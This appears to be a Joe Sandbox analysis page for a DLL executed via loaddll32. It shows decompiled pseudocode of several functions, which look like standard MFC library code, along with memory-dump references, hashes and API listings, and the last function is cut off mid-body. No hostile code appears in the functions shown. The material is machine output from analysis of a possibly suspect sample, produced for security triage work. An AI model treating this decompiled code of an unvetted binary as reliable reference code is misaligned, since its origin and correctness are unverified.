Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction ID: 462ae3bbbf91228899846c1fb6a9f27f843f520308df6a83637efefa3aec2235
Opcode Fuzzy Hash: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction Fuzzy Hash: 3411CE72E04A365BF2229A6D8C80B1B77DCFF49AE0F124115EC0EE7219DB6ACC0046F5

Uniqueness

Uniqueness Score: -1.00%

Function 10011181 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10011181(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10011190
0x100111e1
0x100111e1
0x100111e3
0x100111e7
0x00000000
0x00000000
0x100111ad
0x100111c4
0x100111ca
0x100111dc
0x00000000
0x100111ef
0x100111dc
0x100111e1
0x100111e1
0x100111ec

APIs

ClientToScreen.USER32(?,?), ref: 10011190
GetDlgCtrlID.USER32 ref: 100111A4
GetWindowLongA.USER32 ref: 100111B2
GetWindowRect.USER32 ref: 100111C4
PtInRect.USER32(?,?,?), ref: 100111D4
GetWindow.USER32(?,00000005), ref: 100111E1

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction ID: 0af4e894630c16eeb035fae8976970eddf4787ec4e71c720814606927fab57bb
Opcode Fuzzy Hash: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction Fuzzy Hash: 05014B36A0112ABBEB129F958C48EDE7BACEF49791F008014FE11AE061D730DB458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1F4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000D1F4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000EC09(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10020F40(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000EC09(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10048658; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1000D010(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1000D1B3(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1000D1B3(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x1000d1f4
0x1000d1fa
0x1000d1ff
0x1000d207
0x1000d207
0x1000d20a
0x00000000
0x1000d20e
0x1000d214
0x1000d215
0x1000d216
0x1000d220
0x1000d222
0x1000d22f
0x1000d232
0x1000d237
0x1000d240
0x1000d243
0x1000d248
0x1000d249
0x1000d24c
0x1000d24f
0x1000d254
0x1000d255
0x1000d25c
0x1000d263
0x1000d268
0x1000d26a
0x1000d26c
0x1000d26c
0x1000d26c
0x1000d26a
0x1000d26d
0x1000d271
0x1000d273
0x1000d27d
0x1000d27e
0x1000d285
0x1000d28a
0x1000d28c
0x1000d28e
0x1000d28e
0x1000d28e
0x1000d28c
0x1000d291
0x1000d295
0x1000d29a
0x1000d29b
0x1000d29e
0x1000d2a5
0x1000d2ac
0x1000d2b1
0x1000d2b3
0x1000d2b5
0x1000d2b5
0x1000d2b5
0x1000d2b3
0x1000d2b8
0x1000d2bc
0x1000d2cc
0x1000d2cf
0x1000d2d2
0x1000d2d7
0x1000d2d9
0x1000d2db
0x1000d2db
0x1000d2db
0x1000d2d9
0x1000d2de
0x1000d2e1
0x1000d2f1
0x1000d2f8
0x1000d2ff
0x1000d304
0x1000d306
0x1000d308
0x1000d308
0x1000d308
0x1000d306
0x1000d30a
0x1000d30e
0x1000d319
0x1000d325
0x1000d327
0x1000d327
0x1000d327
0x1000d327
0x1000d32e
0x1000d332
0x1000d33a
0x1000d346
0x1000d346
0x1000d346
0x1000d348
0x1000d34c
0x1000d357
0x1000d363
0x1000d363
0x1000d363
0x1000d36a
0x1000d36d
0x1000d374
0x1000d37c
0x1000d37c
0x1000d37c
0x1000d383
0x1000d386
0x1000d38d
0x1000d399
0x1000d399
0x1000d399
0x1000d3a0
0x1000d3a3
0x1000d3aa
0x1000d3b6
0x1000d3b6
0x1000d3b6
0x1000d3bd
0x1000d3c0
0x1000d3c7
0x1000d3d3
0x1000d3d3
0x1000d3d3
0x1000d3da
0x1000d3dd
0x1000d3e4
0x1000d3f0
0x1000d3f0
0x1000d3f0
0x1000d3f7
0x1000d3fa
0x1000d401
0x1000d40d
0x1000d40d
0x1000d40d
0x1000d414
0x1000d417
0x1000d41e
0x1000d426
0x1000d426
0x1000d426
0x1000d42d
0x1000d430
0x1000d437
0x1000d43f
0x1000d43f
0x1000d43f
0x1000d446
0x1000d449
0x1000d450
0x1000d45c
0x1000d45c
0x1000d45c
0x1000d463
0x1000d466
0x1000d46d
0x1000d479
0x1000d479
0x1000d479
0x1000d480
0x1000d483
0x1000d48a
0x1000d492
0x1000d492
0x1000d492
0x1000d494
0x1000d497
0x1000d49a
0x1000d4a6
0x1000d4a8
0x1000d4ad
0x1000d4b0
0x1000d4b0
0x1000d4b0
0x1000d4bf
0x1000d4c1
0x1000d4c1
0x00000000

APIs

_memset.LIBCMT ref: 1000D222

Strings

@, xrefs: 1000D3C7
AfxMDIFrame80s, xrefs: 1000D2C3
AfxFrameOrView80s, xrefs: 1000D2E8
@, xrefs: 1000D32E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction ID: 8836cd366f4edbb263e832dd9095b9ce1b533ce8c5134698fb64192b8290e0ae
Opcode Fuzzy Hash: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction Fuzzy Hash: 7C8130B5C00259AAFB51DFE4C585BDEBBF8EF043C4F118166F908E6185E7749A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100121BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100121BA(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10045580; // 0xe155dca3
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10011FFD(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10012028(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100203EC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1001213D(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1001213D(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1001FBB5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x100121ba
0x100121ba
0x100121ba
0x100121c0
0x100121c7
0x100121ce
0x100121d4
0x100121d7
0x100121e0
0x100121e1
0x100121ea
0x100121f8
0x100121fb
0x10012203
0x10012219
0x1001221b
0x1001221e
0x10012226
0x10012220
0x10012220
0x10012220
0x10012235
0x100122b3
0x100122b3
0x10012237
0x1001224c
0x10012251
0x10012254
0x00000000
0x10012256
0x10012257
0x1001225d
0x10012262
0x10012264
0x1001226a
0x1001226f
0x10012273
0x10012273
0x10012277
0x1001227b
0x1001227e
0x10012282
0x10012285
0x1001228c
0x1001228f
0x10012297
0x10012291
0x10012291
0x10012291
0x1001229e
0x100122c3
0x100122ca
0x100122d3
0x100122db
0x100122e8
0x100122eb
0x100122f1
0x100122f7
0x100122a5
0x100122a5
0x100122ac
0x100122b1
0x100122bb
0x100122c0
0x00000000
0x00000000
0x00000000
0x00000000
0x100122b1
0x1001229e
0x10012254
0x100122f8
0x100122f9
0x100121d9
0x100121d9
0x100121d9
0x10012306

APIs

GlobalLock.KERNEL32 ref: 100121E4
lstrlenA.KERNEL32(?), ref: 1001222C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10012246

Strings

@, xrefs: 10012220

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: @
API String ID: 1529587224-2766056989
Opcode ID: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction ID: d0a0353f3703c4703b37301af5c7bc2eef77f2bc52e41b95a60fad612e9c4f7d
Opcode Fuzzy Hash: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction Fuzzy Hash: 0041AFB1900219EFDB15CFA4CC85AAEBBB5FF04350F148629E812EF185E774E9A5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B33 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E10013B33(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1001FC2D(E10033E8D, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003876c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E100124A0(_t59, _t59 + 0x24, _t75);
						E10010BA6(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10010D56(_t59, 0x1003b23c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1001B91E(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E10012675(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E100066CE(_t59);
						return E1001FCB0(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1001B865(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E100132FB(_t76);
							_push(_t76);
							E10004D75(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E1000911A(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1001B896(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E100132FB(_t76);
									_push(_t76);
									E10004D75(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

0x10013b33
0x10013b33
0x10013b33
0x10013b3a
0x10013b3f
0x10013b41
0x10013b44
0x10013b4a
0x10013b4f
0x10013b56
0x10013b59
0x10013ba1
0x10013ba5
0x10013bcb
0x10013bce
0x10013bd7
0x10013bdc
0x10013be3
0x10013bf2
0x10013bf4
0x10013bf9
0x10013bfc
0x10013bfd
0x10013bfe
0x10013c04
0x10013c05
0x10013c0d
0x10013c15
0x10013c1d
0x10013c22
0x10013c24
0x10013c1d
0x10013c25
0x10013c2b
0x10013c2b
0x10013c31
0x10013c35
0x10013c3d
0x10013c41
0x10013c46
0x10013c4c
0x10013c56
0x10013c56
0x10013ba7
0x10013baa
0x10013bb1
0x10013bb3
0x10013bb5
0x10013bb9
0x10013bbe
0x10013bbf
0x10013bc4
0x10013bc5
0x00000000
0x10013b5b
0x10013b5b
0x10013b5e
0x10013b5e
0x10013b6c
0x10013b70
0x10013b72
0x10013b77
0x10013b79
0x10013b80
0x10013b87
0x10013b8e
0x10013b93
0x10013b94
0x10013b99
0x10013b80
0x10013b77
0x10013b9a
0x10013b9d
0x00000000
0x10013b5e

APIs

__EH_prolog3_GS.LIBCMT ref: 10013B3A
GetModuleHandleA.KERNEL32(?,1003B23C,00000000), ref: 10013C05
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 10013C15

Strings

mfcm80.dll, xrefs: 10013BF4
MFCM80ReleaseManagedReferences, xrefs: 10013C0F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction ID: effe031cbf4f857fff4e6ce51dcecab954aad45063f71112ee54279e012bf132
Opcode Fuzzy Hash: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction Fuzzy Hash: 8931AD75A046049FDF05DFA0C8857AE77F9EF48340F014098E905AF292EB79E985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10014290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10014290(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1001FC2D(E10033F1F, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038078;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E100136F0(_t91 - 0x54, 0x11) != 0 || E100136F0(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1000ecc8
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000567F(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
